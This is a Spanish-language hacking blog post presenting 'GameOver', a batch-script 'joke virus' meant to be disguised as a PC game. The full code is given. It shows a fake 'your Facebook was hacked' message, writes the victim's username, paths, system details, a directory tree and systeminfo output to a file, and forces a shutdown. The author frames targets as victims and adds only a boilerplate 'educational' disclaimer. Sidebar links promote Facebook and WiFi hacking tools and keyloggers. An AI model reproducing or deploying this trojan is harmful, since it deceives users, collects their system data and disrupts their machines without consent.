㊜Suscribete!!! Quieres seguir este blog? Participa en el sitio

Selecciona tu idioma

Virus GameOver desarrollado en cmd


Un virus es un software que tiene por objetivo alterar el funcionamiento normal del ordenador, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en una computadora, aunque también existen otros más inofensivos, que solo producen molestias.
Los virus informáticos tienen básicamente la función de propagarse a través de un software, son muy nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos, desde una simple broma hasta realizar daños importantes en los sistemas, o bloquear las redes informáticas generando tráfico El funcionamiento de un virus informático es conceptualmente simple. Se ejecuta un programa que está infectado, en la mayoría de las ocasiones, por desconocimiento del usuario.



GameOver
Usando solo comandos de cmd "bat" podemos hacer diferentes tipos de virus, troyanos,gusanos etc.
es una aplicación que tiene los iconos de un vídeo juego de pc que simula que fue hackeado  su facebook, y apaga la maquina una vez que la victima lo ejecute luego extrae todos los datos he información de la pc de nuestra victimas esta desarrollado en bat , es un virus broma podemos observar que los virus pueden estar disfrazado sin que nos demos cuenta a la hora de ejecutar un programa..

algunos comando que nos ayudara a obtener mas datos de la pc de nuestra victima.
  %USERNAME%
  %USERPROFILE%
  %ALLUSERSPROFILE%
  %APPDATA%
  %COMMONPROGRAMFILES%
  %CMDCMDLINE%
  %CMDEXTVERSION%
  %COMPUTERNAME%
  %COMSPEC%
  %DATE%
  %ERRORLEVEL%
  %HOMEDRIVE%
  %HOMEPATH%
  %LOGONSERVER%
  %LOCALAPPDATA%
Nuestro virus esta hecho para usuarios amante a los vídeos juegos una mas de la manera que podemos ser atacados
en otra ocasión presentare un virus mas avanzado.


Código

echo    %USERNAME% Tu Facebook fue hackeado Fecha:%date% Hora:%Time% %random%
echo.  ::----------------------------------------------------------------::
echo.%USERNAME%>>Game.txt 
echo.%USERPROFILE%>>Game.txt 
echo.%ALLUSERSPROFILE%>>Game.txt 
echo.%APPDATA%>>Game.txt 
echo.%COMMONPROGRAMFILES%>>Game.txt 
echo.%CMDCMDLINE%>>Game.txt 
echo.%CMDEXTVERSION%>>Game.txt 
echo.%COMPUTERNAME%>>Game.txt 
echo.%COMSPEC%>>Game.txt 
echo.%DATE%>>Game.txt 
echo.%ERRORLEVEL%>>Game.txt 
echo.%HOMEDRIVE%>>Game.txt 
echo.%HOMEPATH%>>Game.txt 
echo.%LOGONSERVER%>>Game.txt 
echo.%LOCALAPPDATA%>>Game.txt 
echo.%NUMBER_OF_PROCESSORS%>>Game.txt 
echo.%OS%>>Game.txt 
echo.%PATH%>>Game.txt 
echo.%PATHEXT%>>Game.txt 
echo.%PROCESSOR_ARCHITECTURE%>>Game.txt 
echo.%PROCESSOR_IDENTIFIER% >>Game.txt 
echo.%PROCESSOR_LEVEL% >>Game.txt 
echo.%PROCESSOR_REVISION%>>Game.txt 
echo.%PROGRAMDATA% >>Game.txt 
echo.%PROGRAMFILES% >>Game.txt 
echo.%PSModulePath% >>Game.txt 
echo.%PUBLIC% >>Game.txt 
echo.%RANDOM% >>Game.txt 
echo.%SYSTEMDRIVE% >>Game.txt 
echo.%SYSTEMROOT% >>Game.txt 
echo.%TEMP% %TMP% >>Game.txt 
echo.%TIME% >>Game.txt 
echo.%USERNAME% >>Game.txt 
echo.%USERPROFILE% >>Game.txt 
echo.%WINDIR% >>Game.txt 
echo.%ALLUSERSPROFILE% >>Game.txt 
echo.%APPDATA% >>Game.txt 
echo.%CLIENTNAME% >>Game.txt 
echo.%CommonProgramFiles%>>Game.txt 
echo.%COMPUTERNAME% >>Game.txt 
echo.%ComSpec% >>Game.txt 
echo.%HOMEDRIVE% y %SystemDrive% >>Game.txt 
echo.%HOMEPATH% >>Game.txt 
echo.%Path% >>Game.txt 
echo.%PATHEXT% >>Game.txt 
echo.%ProgramFiles% >>Game.txt 
echo.%SystemRoot% y %Windir%>>Game.txt 
echo.%TEMP% y %TMP% >>Game.txt 
echo.%USERNAME% >>Game.txt 
echo.%USERPROFILE%>>Game.txt
::cd %USERPROFILE%
tree>>Game.txt
systeminfo>>Game.txt
shutdown -s -t 360 -c "%USERNAME% Tu Facebook fue hackeado Fecha:%date% Hora:%Time%"
goto menu


Blog 


Mega

github



ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGUN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL. GRACIAS!
Si tienes algún problema, deja un comentario.




㊜Luishiño
Hola soy Luishiño estudio la carrera de ing. sistemas y este es mi Blog personal aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.⚠ Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

Quiero soñar , déjame soñar.


Comentarios

㊜Luishiño

★ ★ ★ ★ ★

Hola soy ぎLuishiño y este es mi Blog personal .. 

Me considero un joven emprendedor,curioso,creativo,alegre y confiable, siempre buscando la manera de mejorar como amigo y persona . Estudio la carrera de ing. sistemas aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.

El cibernauta no es sólo un navegante, es además un navegante solitario. La era de los Hackers.

->⚠ Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

↪Sígueme en las redes sociales↩

Si tienes algún dudas, deja un comentario¿Ha quedado contestada su pregunta? Comparte tu Opinión

Descubrí Facebook

Mira este video y sorprendete

"Es tiempo que te preguntes, si eres libre y si te gusta como ellos te obligan a vivir."

Tu y Las Redes Sociales

Tu y Las Redes Sociales

Publicada por Servicio Técnico "The Seven Codes " en Martes, 5 de diciembre de 2019

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Hackear gmail con Mailgrabber node.js

Vulnerabilidad en facebook hackear con xploitz parte II

WhatScriptApp Spam masivo

Sockberus Autentificación de proxys

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Login y registro con php y base de datos mysql

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Hacking Pack Descargar (Mega)

Droid Jack control sobre los dispositivos Android

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Vulnerabilidad en facebook hackear con xploitz parte II

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Sockberus Autentificación de proxys

Programa Revealer Keylogger Pro

youtube

"Ataque de fuerza bruta Este método se trata de prueba y error, donde el atacante, provisto con algún software automatizado, puede probar miles de combinaciones posibles de diferentes caracteres y longitudes para tratar de abrir la autenticación del usuario, hasta que da con la contraseña correcta."



Libros

by @Luishiño! Publicado en abril 14, 2019

Hackear con ataque de diccionario fuerza bruta | Facebook

$9.99

Libros

by @Luishiño! Publicado en abril 14, 2019

Ingeniería inversas hackeando Aplicaciones de Android | apk infect

$5.99

Únete al chat

QR Donate